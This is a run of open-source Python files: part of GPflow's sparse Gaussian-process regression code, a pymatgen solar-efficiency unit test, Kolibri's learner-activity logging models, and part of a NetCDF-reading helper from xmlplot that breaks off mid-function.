tmp2 = tf.linalg.triangular_solve(LB, tmp1, lower=True)
mean = tf.linalg.matmul(tmp2, c, transpose_a=True)
if full_cov:
var = (
self.kernel(Xnew)
+ tf.linalg.matmul(tmp2, tmp2, transpose_a=True)
- tf.linalg.matmul(tmp1, tmp1, transpose_a=True)
)
var = tf.tile(var[None, ...], [self.num_latent_gps, 1, 1]) # [P, N, N]
else:
var = (
self.kernel(Xnew, full_cov=False)
+ tf.reduce_sum(tf.square(tmp2), 0)
- tf.reduce_sum(tf.square(tmp1), 0)
)
var = tf.tile(var[:, None], [1, self.num_latent_gps])
return mean + self.mean_function(Xnew), var
def compute_qu(self) -> Tuple[tf.Tensor, tf.Tensor]:
"""
Computes the mean and variance of q(u) = N(mu, cov), the variational distribution on
inducing outputs. SVGP with this q(u) should predict identically to
SGPR.
:return: mu, cov
"""
X_data, Y_data = self.data
kuf = Kuf(self.inducing_variable, self.kernel, X_data)
kuu = Kuu(self.inducing_variable, self.kernel, jitter=default_jitter())
sig = kuu + (self.likelihood.variance ** -1) * tf.matmul(kuf, kuf, transpose_b=True)
sig_sqrt = tf.linalg.cholesky(sig)
sig_sqrt_kuu = tf.linalg.triangular_solve(sig_sqrt, kuu)
cov = tf.linalg.matmul(sig_sqrt_kuu, sig_sqrt_kuu, transpose_a=True)
err = Y_data - self.mean_function(X_data)
mu = (
tf.linalg.matmul(
sig_sqrt_kuu,
tf.linalg.triangular_solve(sig_sqrt, tf.linalg.matmul(kuf, err)),
transpose_a=True,
)
/ self.likelihood.variance
)
return mu, cov
class GPRFITC(SGPRBase_deprecated):
"""
This implements GP regression with the FITC approximation.
The key reference is
::
@inproceedings{Snelson06sparsegaussian,
author = {Edward Snelson and Zoubin Ghahramani},
title = {Sparse Gaussian Processes using Pseudo-inputs},
booktitle = {Advances In Neural Information Processing Systems},
year = {2006},
pages = {1257--1264},
publisher = {MIT press}
}
Implementation loosely based on code from GPML matlab library although
obviously gradients are automatic in GPflow.
"""
def common_terms(
self,
) -> Tuple[tf.Tensor, tf.Tensor, tf.Tensor, tf.Tensor, tf.Tensor, tf.Tensor, tf.Tensor]:
X_data, Y_data = self.data
num_inducing = self.inducing_variable.num_inducing
err = Y_data - self.mean_function(X_data) # size [N, R]
Kdiag = self.kernel(X_data, full_cov=False)
kuf = Kuf(self.inducing_variable, self.kernel, X_data)
kuu = Kuu(self.inducing_variable, self.kernel, jitter=default_jitter())
Luu = tf.linalg.cholesky(kuu) # => Luu Luu^T = kuu
V = tf.linalg.triangular_solve(Luu, kuf) # => V^T V = Qff = kuf^T kuu^-1 kuf
diagQff = tf.reduce_sum(tf.square(V), 0)
nu = Kdiag - diagQff + self.likelihood.variance
B = tf.eye(num_inducing, dtype=default_float()) + tf.linalg.matmul(
V / nu, V, transpose_b=True
)
L = tf.linalg.cholesky(B)
beta = err / tf.expand_dims(nu, 1) # size [N, R]
alpha = tf.linalg.matmul(V, beta) # size [N, R]
gamma = tf.linalg.triangular_solve(L, alpha, lower=True) # size [N, R]
return err, nu, Luu, L, alpha, beta, gamma
# type-ignore is because of changed method signature:
def maximum_log_likelihood_objective(self) -> tf.Tensor: # type: ignore
return self.fitc_log_marginal_likelihood()
def fitc_log_marginal_likelihood(self) -> tf.Tensor:
"""
Construct a tensorflow function to compute the bound on the marginal
likelihood.
"""
# FITC approximation to the log marginal likelihood is
# log ( normal( y | mean, K_fitc ) )
# where K_fitc = Qff + diag( \nu )
# where Qff = Kfu kuu^{-1} kuf
# with \nu_i = Kff_{i,i} - Qff_{i,i} + \sigma^2
# We need to compute the Mahalanobis term -0.5* err^T K_fitc^{-1} err
# (summed over functions).
# We need to deal with the matrix inverse term.
# K_fitc^{-1} = ( Qff + \diag( \nu ) )^{-1}
# = ( V^T V + \diag( \nu ) )^{-1}
# Applying the Woodbury identity we obtain
# = \diag( \nu^{-1} )
# - \diag( \nu^{-1} ) V^T ( I + V \diag( \nu^{-1} ) V^T )^{-1}
# V \diag(\nu^{-1} )
# Let \beta = \diag( \nu^{-1} ) err
# and let \alpha = V \beta
# then Mahalanobis term = -0.5* (
# \beta^T err - \alpha^T Solve( I + V \diag( \nu^{-1} ) V^T, alpha )
# )
err, nu, _Luu, L, _alpha, _beta, gamma = self.common_terms()
mahalanobisTerm = -0.5 * tf.reduce_sum(
tf.square(err) / tf.expand_dims(nu, 1)
) + 0.5 * tf.reduce_sum(tf.square(gamma))
# We need to compute the log normalizing term -N/2 \log 2 pi - 0.5 \log \det( K_fitc )
# We need to deal with the log determinant term.
# \log \det( K_fitc ) = \log \det( Qff + \diag( \nu ) )
# = \log \det( V^T V + \diag( \nu ) )
# Applying the determinant lemma we obtain
# = \log [ \det \diag( \nu ) \det( I + V \diag( \nu^{-1} ) V^T ) ]
# = \log [
# \det \diag( \nu ) ] + \log [ \det( I + V \diag( \nu^{-1} ) V^T )
# ]
constantTerm = -0.5 * self.num_data * tf.math.log(tf.constant(2.0 * np.pi, default_float()))
logDeterminantTerm = -0.5 * tf.reduce_sum(tf.math.log(nu)) - tf.reduce_sum(
tf.math.log(tf.linalg.diag_part(L))
)
logNormalizingTerm = constantTerm + logDeterminantTerm
return mahalanobisTerm + logNormalizingTerm * self.num_latent_gps
def predict_f(
self, Xnew: InputData, full_cov: bool = False, full_output_cov: bool = False
) -> MeanAndVariance:
"""
Compute the mean and variance of the latent function at some new points
Xnew.
"""
_, _, Luu, L, _, _, gamma = self.common_terms()
Kus = Kuf(self.inducing_variable, self.kernel, Xnew) # [M, N]
w = tf.linalg.triangular_solve(Luu, Kus, lower=True) # [M, N]
tmp = tf.linalg.triangular_solve(tf.transpose(L), gamma, lower=False)
mean = tf.linalg.matmul(w, tmp, transpose_a=True) + self.mean_function(Xnew)
intermediateA = tf.linalg.triangular_solve(L, w, lower=True)
if full_cov:
var = (
self.kernel(Xnew)
- tf.linalg.matmul(w, w, transpose_a=True)
+ tf.linalg.matmul(intermediateA, intermediateA, transpose_a=True)
)
var = tf.tile(var[None, ...], [self.num_latent_gps, 1, 1]) # [P, N, N]
else:
var = (
self.kernel(Xnew, full_cov=False)
- tf.reduce_sum(tf.square(w), 0)
+ tf.reduce_sum(tf.square(intermediateA), 0)
) # [N, P]
var = tf.tile(var[:, None], [1, self.num_latent_gps])
return mean, var
class SGPR_with_posterior(SGPR_deprecated):
"""
This is an implementation of GPR that provides a posterior() method that
enables caching for faster subsequent predictions.
"""
def posterior(
self,
precompute_cache: posteriors.PrecomputeCacheType = posteriors.PrecomputeCacheType.TENSOR,
) -> posteriors.SGPRPosterior:
"""
Create the Posterior object which contains precomputed matrices for
faster prediction.
precompute_cache has three settings:
- `PrecomputeCacheType.TENSOR` (or `"tensor"`): Precomputes the cached
quantities and stores them as tensors (which allows differentiating
through the prediction). This is the default.
- `PrecomputeCacheType.VARIABLE` (or `"variable"`): Precomputes the cached
quantities and stores them as variables, which allows for updating
their values without changing the compute graph (relevant for AOT
compilation).
- `PrecomputeCacheType.NOCACHE` (or `"nocache"` or `None`): Avoids
immediate cache computation. This is useful for avoiding extraneous
computations when you only want to call the posterior's
`fused_predict_f` method.
"""
return posteriors.SGPRPosterior(
kernel=self.kernel,
data=self.data,
inducing_variable=self.inducing_variable,
likelihood_variance=self.likelihood.variance,
num_latent_gps=self.num_latent_gps,
mean_function=self.mean_function,
precompute_cache=precompute_cache,
)
def predict_f(
self, Xnew: InputData, full_cov: bool = False, full_output_cov: bool = False
) -> MeanAndVariance:
"""
For backwards compatibility, GPR's predict_f uses the fused (no-cache)
computation, which is more efficient during training.
For faster (cached) prediction, predict directly from the posterior object, i.e.,:
model.posterior().predict_f(Xnew, ...)
"""
return self.posterior(posteriors.PrecomputeCacheType.NOCACHE).fused_predict_f(
Xnew, full_cov=full_cov, full_output_cov=full_output_cov
)
class SGPR(SGPR_with_posterior):
# subclassed to ensure __class__ == "SGPR"
pass
|
GPflow/GPflow
|
gpflow/models/sgpr.py
|
Python
|
apache-2.0
| 20,495
|
[
"Gaussian"
] |
645221fbaa798179413ab447bc8ee9c82e7c805653c83dbbe87e97c888bef0f4
|
import os
import unittest
import warnings
from pymatgen.analysis.solar.slme import optics, slme
from pymatgen.util.testing import PymatgenTest
class SolarTest(PymatgenTest):
_multiprocess_shared_ = True
def setUp(self):
warnings.simplefilter("ignore")
def tearDown(self):
warnings.simplefilter("default")
def test_slme_from_vasprun(self):
path = os.path.join(os.path.dirname(__file__), "vasprun.xml")
en, abz, dirgap, indirgap = optics(path)
abz = abz * 100.0
eff = slme(en, abz, indirgap, indirgap, plot_current_voltage=False)
self.assertAlmostEqual(eff, 27.728998512472298, places=5)
if __name__ == "__main__":
unittest.main()
|
vorwerkc/pymatgen
|
pymatgen/analysis/solar/tests/test_slme.py
|
Python
|
mit
| 713
|
[
"pymatgen"
] |
1f0124a7518986bfcc8c190b67671114a8d16de2b67ab3b2a5e75844bec21ae4
|
"""
This app is intended to provide the core functionality for tracking user
engagement with content and Kolibri in general. As such, it is intended
to store details of user interactions with content, a summary of those
interactions, interactions with the software in general, as well as user
feedback on the content and the software.
"""
from __future__ import unicode_literals
from datetime import timedelta
from django.core.exceptions import ObjectDoesNotExist
from django.core.exceptions import ValidationError
from django.core.validators import MaxValueValidator
from django.core.validators import MinValueValidator
from django.db import models
from django.utils import timezone
from jsonfield import JSONField
from morango.query import SyncableModelQuerySet
from .permissions import AnyoneCanWriteAnonymousLogs
from kolibri.core.auth.constants import role_kinds
from kolibri.core.auth.models import AbstractFacilityDataModel
from kolibri.core.auth.models import Facility
from kolibri.core.auth.models import FacilityUser
from kolibri.core.auth.permissions.base import RoleBasedPermissions
from kolibri.core.auth.permissions.general import IsOwn
from kolibri.core.content.models import UUIDField
from kolibri.core.exams.models import Exam
from kolibri.core.fields import DateTimeTzField
from kolibri.utils.time import local_now
class BaseLogQuerySet(SyncableModelQuerySet):
def filter_by_topic(self, topic, content_id_lookup="content_id"):
"""
Filter a set of logs by content_id, using content_ids from all descendants of specified topic.
"""
content_ids = topic.get_descendant_content_ids()
return self.filter_by_content_ids(content_ids)
def filter_by_content_ids(self, content_ids, content_id_lookup="content_id"):
"""
Filter a set of logs by content_id, using content_ids from the provided list or queryset.
"""
return self.filter(**{content_id_lookup + "__in": content_ids})
def log_permissions(user_field):
return (
AnyoneCanWriteAnonymousLogs(field_name=user_field + '_id') |
IsOwn(field_name=user_field + '_id') |
RoleBasedPermissions(
target_field=user_field,
can_be_created_by=(role_kinds.ADMIN,),
can_be_read_by=(role_kinds.ADMIN, role_kinds.COACH),
can_be_updated_by=(role_kinds.ADMIN,),
can_be_deleted_by=(role_kinds.ADMIN,),
)
)
class BaseLogModel(AbstractFacilityDataModel):
permissions = log_permissions("user")
class Meta:
abstract = True
def infer_dataset(self, *args, **kwargs):
if self.user:
return self.user.dataset
elif self.dataset_id:
# confirm that there exists a facility with that dataset_id
try:
return Facility.objects.get(dataset_id=self.dataset_id).dataset
except Facility.DoesNotExist:
pass
# if no user or matching facility, infer dataset from the default facility
facility = Facility.get_default_facility()
assert facility, "Before you can save logs, you must have a facility"
return facility.dataset
objects = BaseLogQuerySet.as_manager()
def calculate_partition(self):
if self.user_id:
return '{dataset_id}:user-rw:{user_id}'.format(dataset_id=self.dataset_id, user_id=self.user_id)
else:
return '{dataset_id}:anonymous'.format(dataset_id=self.dataset_id)
class ContentSessionLog(BaseLogModel):
"""
This model provides a record of interactions with a content item within a single visit to that content page.
"""
# Morango syncing settings
morango_model_name = "contentsessionlog"
user = models.ForeignKey(FacilityUser, blank=True, null=True)
content_id = UUIDField(db_index=True)
channel_id = UUIDField()
start_timestamp = DateTimeTzField()
end_timestamp = DateTimeTzField(blank=True, null=True)
time_spent = models.FloatField(help_text="(in seconds)", default=0.0, validators=[MinValueValidator(0)])
progress = models.FloatField(default=0, validators=[MinValueValidator(0)])
kind = models.CharField(max_length=200)
extra_fields = JSONField(default={}, blank=True)
def save(self, *args, **kwargs):
if self.progress < 0:
raise ValidationError("Progress out of range (<0)")
super(ContentSessionLog, self).save(*args, **kwargs)
class ContentSummaryLog(BaseLogModel):
"""
This model provides a summary of all interactions a user has had with a content item.
"""
# Morango syncing settings
morango_model_name = "contentsummarylog"
user = models.ForeignKey(FacilityUser)
content_id = UUIDField(db_index=True)
channel_id = UUIDField()
start_timestamp = DateTimeTzField()
end_timestamp = DateTimeTzField(blank=True, null=True)
completion_timestamp = DateTimeTzField(blank=True, null=True)
time_spent = models.FloatField(help_text="(in seconds)", default=0.0, validators=[MinValueValidator(0)])
progress = models.FloatField(default=0, validators=[MinValueValidator(0), MaxValueValidator(1.01)])
kind = models.CharField(max_length=200)
extra_fields = JSONField(default={}, blank=True)
def calculate_source_id(self):
return self.content_id
def save(self, *args, **kwargs):
if self.progress < 0 or self.progress > 1.01:
raise ValidationError("Content summary progress out of range (0-1)")
super(ContentSummaryLog, self).save(*args, **kwargs)
class UserSessionLog(BaseLogModel):
"""
This model provides a record of a user session in Kolibri.
"""
# Morango syncing settings
morango_model_name = "usersessionlog"
user = models.ForeignKey(FacilityUser)
channels = models.TextField(blank=True)
start_timestamp = DateTimeTzField(default=local_now)
last_interaction_timestamp = DateTimeTzField(null=True, blank=True)
pages = models.TextField(blank=True)
@classmethod
def update_log(cls, user):
"""
Update the current UserSessionLog for a particular user.
"""
if user and isinstance(user, FacilityUser):
try:
user_session_log = cls.objects.filter(user=user).latest('last_interaction_timestamp')
except ObjectDoesNotExist:
user_session_log = None
if not user_session_log or timezone.now() - user_session_log.last_interaction_timestamp > timedelta(minutes=5):
user_session_log = cls(user=user)
user_session_log.last_interaction_timestamp = local_now()
user_session_log.save()
class MasteryLog(BaseLogModel):
"""
This model provides a summary of a user's engagement with an assessment within a mastery level
"""
# Morango syncing settings
morango_model_name = "masterylog"
user = models.ForeignKey(FacilityUser)
# Every MasteryLog is related to the single summary log for the user/content pair
summarylog = models.ForeignKey(ContentSummaryLog, related_name="masterylogs")
# The MasteryLog records the mastery criterion that has been specified for the user.
# It is recorded here to prevent this changing in the middle of a user's engagement
# with an assessment.
mastery_criterion = JSONField(default={})
start_timestamp = DateTimeTzField()
end_timestamp = DateTimeTzField(blank=True, null=True)
completion_timestamp = DateTimeTzField(blank=True, null=True)
# The integer mastery level that this log is tracking.
mastery_level = models.IntegerField(validators=[MinValueValidator(1), MaxValueValidator(10)])
# Has this mastery level been completed?
complete = models.BooleanField(default=False)
def infer_dataset(self, *args, **kwargs):
return self.user.dataset
def calculate_source_id(self):
return "{summarylog_id}:{mastery_level}".format(summarylog_id=self.summarylog_id, mastery_level=self.mastery_level)
class BaseAttemptLog(BaseLogModel):
"""
This is an abstract model that provides a summary of a user's engagement within a particular
interaction with an item/question in an assessment
"""
# Unique identifier within the relevant assessment for the particular question/item
# that this attemptlog is a record of an interaction with.
item = models.CharField(max_length=200)
start_timestamp = DateTimeTzField()
end_timestamp = DateTimeTzField()
completion_timestamp = DateTimeTzField(blank=True, null=True)
time_spent = models.FloatField(help_text="(in seconds)", default=0.0, validators=[MinValueValidator(0)])
complete = models.BooleanField(default=False)
# How correct was their answer? In simple cases, just 0 or 1.
correct = models.FloatField(validators=[MinValueValidator(0), MaxValueValidator(1)])
hinted = models.BooleanField(default=False)
# JSON blob that would allow the learner's answer to be rerendered in the frontend interface
answer = JSONField(default={}, null=True, blank=True)
# A human readable answer that could be rendered directly in coach reports, can be blank.
simple_answer = models.CharField(max_length=200, blank=True)
# A JSON Array with a sequence of JSON objects that describe the history of interaction of the user
# with this assessment item in this attempt.
interaction_history = JSONField(default=[], blank=True)
user = models.ForeignKey(FacilityUser, blank=True, null=True)
error = models.BooleanField(default=False)
class Meta:
abstract = True
class AttemptLog(BaseAttemptLog):
"""
This model provides a summary of a user's engagement within a particular interaction with an
item/question in an assessment
"""
morango_model_name = 'attemptlog'
# Which mastery log was this attemptlog associated with?
masterylog = models.ForeignKey(MasteryLog, related_name="attemptlogs", blank=True, null=True)
sessionlog = models.ForeignKey(ContentSessionLog, related_name="attemptlogs")
def infer_dataset(self, *args, **kwargs):
return self.sessionlog.dataset
class ExamLog(BaseLogModel):
"""
This model provides a summary of a user's interaction with a particular exam, and serves as
an aggregation point for individual attempts on that exam.
"""
morango_model_name = 'examlog'
# Identifies the exam that this is for.
exam = models.ForeignKey(Exam, related_name="examlogs", blank=False, null=False)
# Identifies which user this log summarizes interactions for.
user = models.ForeignKey(FacilityUser)
# Is this exam open for engagement, or is it closed?
# Used to end user engagement with an exam when it has been deactivated.
closed = models.BooleanField(default=False)
# when was this exam finished?
completion_timestamp = DateTimeTzField(blank=True, null=True)
def calculate_source_id(self):
return "{exam_id}:{user_id}".format(exam_id=self.exam_id, user_id=self.user_id)
def calculate_partition(self):
return self.dataset_id
class ExamAttemptLog(BaseAttemptLog):
"""
This model provides a summary of a user's engagement within a particular interaction with an
item/question in an exam
"""
morango_model_name = 'examattemptlog'
examlog = models.ForeignKey(ExamLog, related_name="attemptlogs", blank=False, null=False)
# We have no session logs associated with ExamLogs, so we need to record the channel and content
# ids here
content_id = UUIDField()
channel_id = UUIDField()
def infer_dataset(self, *args, **kwargs):
return self.examlog.dataset
def calculate_partition(self):
return self.dataset_id
|
DXCanas/kolibri
|
kolibri/core/logger/models.py
|
Python
|
mit
| 11,759
|
[
"VisIt"
] |
ae85f38e33102bf30f632ce2992a05cc3b80daa82174f772aa65569fbe156683
|
# Import modules from standard Python library
import os, sys, re, datetime, shutil, types, UserDict, glob
# Import additional third party modules
import numpy
# Import our custom modules
import xmlplot.common, xmlstore.util
def openNetCDF(path,mode='r'):
# Test if the path contains wildcard, and resolves to multiple files.
# If so, we will try to combine these files.
if isinstance(path,basestring):
paths = glob.glob(path)
if len(paths)==1:
path = paths[0]
elif len(paths)>1:
path = paths
if isinstance(path,basestring):
return getNetCDFFile(path,mode)
else:
assert mode=='r','A multi-file NetCDF dataset can only be opened for reading.'
return MultiNetCDFFile(*path)
netcdfmodules,selectednetcdfmodule = None,None
def chooseNetCDFModule(forcedmodule=None):
if forcedmodule is None:
# Select default NetCDF module.
enumerateNetCDFModules()
else:
# Find user-specified NetCDF module.
global selectednetcdfmodule
if netcdfmodules is None: enumerateNetCDFModules()
for selectednetcdfmodule,(m,v) in enumerate(netcdfmodules):
if m==forcedmodule: break
else:
raise Exception('Forced NetCDF module "%s" is not available. Available modules: %s.' % (forcedmodule,', '.join([m[0] for m in netcdfmodules])))
def enumerateNetCDFModules():
global netcdfmodules,selectednetcdfmodule
global pupynere,Scientific,netCDF4,pynetcdf
netcdfmodules = []
selectednetcdfmodule = -1
error = ''
# Try to locate netCDF4.
ready = True
try:
import netCDF4
except ImportError,e:
error += 'Cannot load netCDF4. Reason: %s.\n' % str(e)
ready = False
if ready:
if selectednetcdfmodule==-1: selectednetcdfmodule = len(netcdfmodules)
netcdfmodules.append(('netCDF4',netCDF4.__version__))
# Try to locate ScientificPython.
# Note that is is best done after trying netCDF4, because ScientificPython's version of the NetCDF library is generally lower (3.x).
# If ScientificPython is loaded first, netCDF4 is unable to load the required >=4 version of the NetCDF library.
# If ScientificPython is loaded after netCDF4, it will use the NetCDF library loaded by netCDF4, if both these modules are present.
ready = True
try:
import Scientific.IO.NetCDF
except ImportError,e:
error += 'Cannot load Scientific.IO.NetCDF. Reason: %s.\n' % str(e)
ready = False
if ready:
oldscientific = False
try:
version = map(int,Scientific.__version__.split('.')[:2])
oldscientific = version[0]<2 or (version[0]==2 and version[1]<7)
except: pass
if not oldscientific and selectednetcdfmodule==-1: selectednetcdfmodule = len(netcdfmodules)
netcdfmodules.append(('Scientific.IO.NetCDF',Scientific.__version__))
# Try to locate pynetcdf.
ready = True
try:
import pynetcdf
except ImportError,e:
error += 'Cannot load pynetcdf. Reason: %s.\n' % str(e)
ready = False
if ready:
if selectednetcdfmodule==-1:
pyver = sys.version_info
if (pyver[0]==2 and pyver[1]>=5) or pyver[0]>2:
print 'pynetcdf will be used for NetCDF support. Note though that pynetcdf has known incompatibilities with Python 2.5 and higher, and you are using Python %i.%i.%i.' % (pyver[0],pyver[1],pyver[2])
selectednetcdfmodule = len(netcdfmodules)
netcdfmodules.append(('pynetcdf',''))
# Try to locate PuPyNeRe, though that does not work for all NetCDF files (e.g., GOTM!).
ready = True
try:
import pupynere
except ImportError,e:
error += 'Cannot load pupynere. Reason: %s.\n' % str(e)
ready = False
if ready:
if selectednetcdfmodule==-1: selectednetcdfmodule = len(netcdfmodules)
netcdfmodules.append(('pupynere','unknown'))
if selectednetcdfmodule==-1 and netcdfmodules: selectednetcdfmodule = 0
class NetCDFError(Exception): pass
def getNetCDFFile(path,mode='r'):
"""Returns a NetCDFFile file object representing the NetCDF file
at the specified path. The returned object follows
Scientific.IO.NetCDFFile conventions.
Note: this is the *only* function that needs to know which NetCDF
module to use. All other functions just operate on an object
returned by this function, and expect this object to follow
Scientific.IO.NetCDFFile conventions. Thus adding/replacing a module
for NetCDF support should only require a change in this function.
"""
if selectednetcdfmodule is None: chooseNetCDFModule()
# First import NetCDF file format support (we do this here rather
# than on import, because this module can be useful without NetCDF
# support as well).
netcdfmodule = None
if netcdfmodules: netcdfmodule = netcdfmodules[selectednetcdfmodule][0]
# First check if the file exists in the first place.
if mode=='r' and netcdfmodule!='netCDF4' and not os.path.isfile(path):
raise NetCDFError('"%s" is not an existing file.' % path)
if netcdfmodule=='Scientific.IO.NetCDF':
try:
nc = Scientific.IO.NetCDF.NetCDFFile(path,mode=mode)
except Exception, e:
raise NetCDFError('An error occured while opening the NetCDF file "%s": %s' % (path,str(e)))
elif netcdfmodule=='netCDF4':
try:
nc = netCDF4.Dataset(path,mode=mode,format='NETCDF3_CLASSIC')
except Exception, e:
raise NetCDFError('An error occured while opening the NetCDF file "%s": %s' % (path,str(e)))
elif netcdfmodule=='pupynere':
try:
nc = pupynere.NetCDFFile(path,mode=mode,mmap=False)
except Exception, e:
raise NetCDFError('An error occured while opening the NetCDF file "%s": %s' % (path,str(e)))
elif netcdfmodule=='pynetcdf':
try:
nc = pynetcdf.NetCDFFile(path,mode=mode)
except Exception, e:
raise NetCDFError('An error occured while opening the NetCDF file "%s": %s' % (path,str(e)))
else:
# No NetCDF module found - raise exception.
raise NetCDFError('Cannot load a module for NetCDF reading. Please install either ScientificPython, python-netcdf4 or pynetcdf.')
return nc
class ReferenceTimeParseError(Exception): pass
reNcDate,reNcTime,reNcTimeZone = None,None,None
def parseNcTimeUnit(fullunit):
"""Parses a udunits/COARDS units string to extract the reference time and time unit.
Raises an exception if the string does not match udunits/COARDS convention.
Returns the time unit (in days), and the reference date+time used.
Supposedly the udunits package could do this, but so far I have not found a minimal
udunits module for Python.
"""
# Retrieve time unit (in days) and reference date/time, based on COARDS convention.
if ' since ' not in fullunit:
raise ReferenceTimeParseError('"units" attribute equals "%s", which does not follow COARDS convention. Problem: string does not contain " since ".' % fullunit)
timeunit,reftime = fullunit.split(' since ')
global reNcDate,reNcTime,reNcTimeZone
if reNcDate is None:
reNcDate = re.compile(r'(\d\d\d\d)[-\/](\d{1,2})-(\d{1,2})\s*')
reNcTime = re.compile(r'(\d{1,2}):(\d{1,2}):(\d{1,2}(?:\.\d*)?)\s*')
reNcTimeZone = re.compile(r'(-?\d{1,2})(?::?(\d\d))?$')
# Parse the reference date, time and timezone
datematch = reNcDate.match(reftime)
if datematch is None:
raise ReferenceTimeParseError('"units" attribute equals "%s", which does not follow COARDS convention. Problem: cannot parse date in "%s".' % (fullunit,reftime))
year,month,day = map(int,datematch.group(1,2,3))
year = max(year,1900) # datetime year>=datetime.MINYEAR, but strftime needs year>=1900
hours,minutes,seconds,mseconds = 0,0,0,0
reftime = reftime[datematch.end():]
if len(reftime)>0:
timematch = reNcTime.match(reftime)
if timematch is None:
raise ReferenceTimeParseError('"units" attribute equals "%s", which does not follow COARDS convention. Problem: cannot parse time in "%s".' % (fullunit,reftime))
hours,minutes = map(int,timematch.group(1,2))
seconds = float(timematch.group(3))
mseconds = 1e6*(seconds % 1.)
seconds = int(seconds)
reftime = reftime[timematch.end():]
dateref = datetime.datetime(year,month,day,hours,minutes,seconds,tzinfo=xmlstore.util.getUTC())
if len(reftime)>0:
timezonematch = reNcTimeZone.match(reftime)
if timezonematch is None:
raise ReferenceTimeParseError('"units" attribute equals "%s", which does not follow COARDS convention. Problem: cannot parse time zone in "%s".' % (fullunit,reftime))
if timezonematch.group(2) is None:
dhour,dmin = int(timezonematch.group(1)),0
else:
dhour,dmin = map(int,timezonematch.group(1,2))
if dhour<0: dmin = -dmin
dateref -= datetime.timedelta(hours=dhour,minutes=dmin)
# Get time unit in number of days.
timeunit = timeunit.lower()
if timeunit in ('seconds','second','secs','sec','ss','s'):
timeunit = 1./86400.
elif timeunit in ('minutes','minute','mins','min'):
timeunit = 1./1440.
elif timeunit in ('hours','hour','hrs','hr','hs','h'):
timeunit = 1./24.
elif timeunit in ('days','day','ds','d'):
timeunit = 1.
elif timeunit in ('months','month'):
timeunit = 365.242198781/12. # udunits convention: month=year/12=365.242198781/12 days
elif timeunit in ('years','year','yrs','yr','ys','y'):
timeunit = 365.242198781 # udunits convention: year=365.242198781 days
else:
raise ReferenceTimeParseError('"units" attribute equals "%s", which does not follow COARDS convention. Problem: unknown time unit "%s".' % (fullunit,timeunit))
return timeunit,dateref
def getNcAttributes(obj):
"""Transparent access to the attributes of a NetCDF file or variable,
using the clean ncattrs method of NetCDF4 if available.
"""
if hasattr(obj,'ncattrs'): return obj.ncattrs()
names = dir(obj)
if 'close' in names:
# NetCDF file
return [name for name in names if name not in ('close','createDimension','createVariable','flush','sync')]
else:
# NetCDF variable
return [name for name in names if name not in ('assignValue','getValue','typecode')]
def getNcData(ncvar,bounds=None,maskoutsiderange=True):
"""Returns a slab of values from a NetCDF variable, respecting several NetCDF attributes
such as missing value specifications, valid value ranges, time unit, etc.
"""
# Disable automatic masking [python-netcdf only!]
if hasattr(ncvar,'set_auto_maskandscale'): ncvar.set_auto_maskandscale(False)
if bounds:
# Bounds provided - read a slice.
if len(ncvar.shape)!=len(bounds): raise Exception('Number of provided slices (%i) does not match number of dimensions (%i).' % (len(bounds),len(ncvar.shape)))
dat = numpy.asarray(ncvar[bounds])
elif len(ncvar.shape)>0:
# Variable is non-scalar - read all data.
dat = numpy.asarray(ncvar[(slice(None),)*len(ncvar.shape)])
else:
# Variable is a scalar - read all data.
dat = numpy.asarray(ncvar.getValue())
# Start without mask, and define function for creating/updating mask
mask = None
def addmask(mask,newmask):
if mask is None:
mask = newmask
else:
mask |= newmask
return mask
def getAttribute(att,**kwargs):
if not hasattr(ncvar,att): return
val = getattr(ncvar,att)
try:
return numpy.asarray(val,**kwargs)
except:
print 'WARNING: NetCDF attribute "%s" cannot be cast to required data type (%s) and will therefore be ignored. Attribute type: %s. Attribute value: %s.' % (att,kwargs.get('dtype','unspecified'),type(val),val)
return None
# Process the various COARDS/CF variable attributes for missing data.
if maskoutsiderange:
minval,maxval = getAttribute('valid_min',dtype=dat.dtype),getAttribute('valid_max',dtype=dat.dtype)
valrange = getAttribute('valid_range',dtype=dat.dtype)
if valrange is not None:
if not len(valrange)==2:
print 'WARNING: NetCDF attribute "valid_range" must consist of two values, but contains %i. It will be ignored.' % len(ncvar.valid_range)
else:
if minval is None or valrange[0]>minval: minval = valrange[0]
if maxval is None or valrange[1]<maxval: maxval = valrange[1]
if minval is not None: mask = addmask(mask,dat<minval)
if maxval is not None: mask = addmask(mask,dat>maxval)
# Variable to receive the final fill value to use for masked array creation.
final_fill_value = None
# Interpret missing value attribute (may be a 1D array).
missingval = getAttribute('missing_value',dtype=dat.dtype)
if missingval is not None:
missingval.shape = (-1,)
for v in missingval: mask = addmask(mask,dat==v)
final_fill_value = missingval[0]
else:
missingval = ()
# Interpret fill value attribute.
fillval = getAttribute('_FillValue',dtype=dat.dtype)
if fillval is not None and fillval not in missingval:
mask = addmask(mask,dat==fillval)
final_fill_value = fillval
# Apply the combined mask (if any)
if mask is not None and mask.any(): dat = numpy.ma.masked_array(dat,mask=mask,copy=False,fill_value=final_fill_value)
# If we have to apply a transformation to the data, the final data type is defined by the transformation parameters.
# cast the data array to that type if needed.
scale = getAttribute('scale_factor')
offset = getAttribute('add_offset')
targetdtype = None
if scale is not None:
targetdtype = numpy.asarray(scale).dtype
elif offset is not None:
targetdtype = numpy.asarray(offset).dtype
if targetdtype is not None and targetdtype!=dat.dtype:
dat = dat.astype(targetdtype)
# Apply transformation to data based on nc variable attributes.
if scale is not None and scale !=1.: dat *= scale
if offset is not None and offset!=0.: dat += offset
# If the unit is time, convert to internal time unit
if hasattr(ncvar,'units'):
timeref = None
try:
timeunit,timeref = parseNcTimeUnit(ncvar.units)
except ReferenceTimeParseError:
pass
if timeref is not None:
timeref = xmlplot.common.date2num(timeref)
if dat.dtype!=numpy.float64: dat = dat.astype(numpy.float64)
dat = timeref+timeunit*dat
return dat
class MultiNetCDFFile(object):
class CoordinatesIdenticalException(Exception): pass
class Variable(object):
def __init__(self,store,name):
self.store = store
self.name = name
self.ncvars = [nc.variables[name] for nc in self.store.ncs]
def __array__(self,*args,**kwargs):
return numpy.asarray(self[(Ellipsis,)],*args,**kwargs)
def __getitem__(self,indices):
if not isinstance(indices,(tuple,list)): indices = (indices,)
dims = list(self.dimensions)
idim = dims.index(self.store.variabledim)
shape = self.shape
indices = xmlplot.common.processEllipsis(indices,len(shape))
indices = list(indices)
if isinstance(indices[idim],slice):
istart,istop,istep = indices[idim].indices(shape[idim])
else:
istart = indices[idim]
istop = istart+1
data = []
for ivar,ncvar in enumerate(self.ncvars):
if istart>=ncvar.shape[idim]:
# Start position beyond current file.
istart -= ncvar.shape[idim]
istop -= ncvar.shape[idim]
else:
# Start position within current file.
if isinstance(indices[idim],int):
indices[idim] = istart
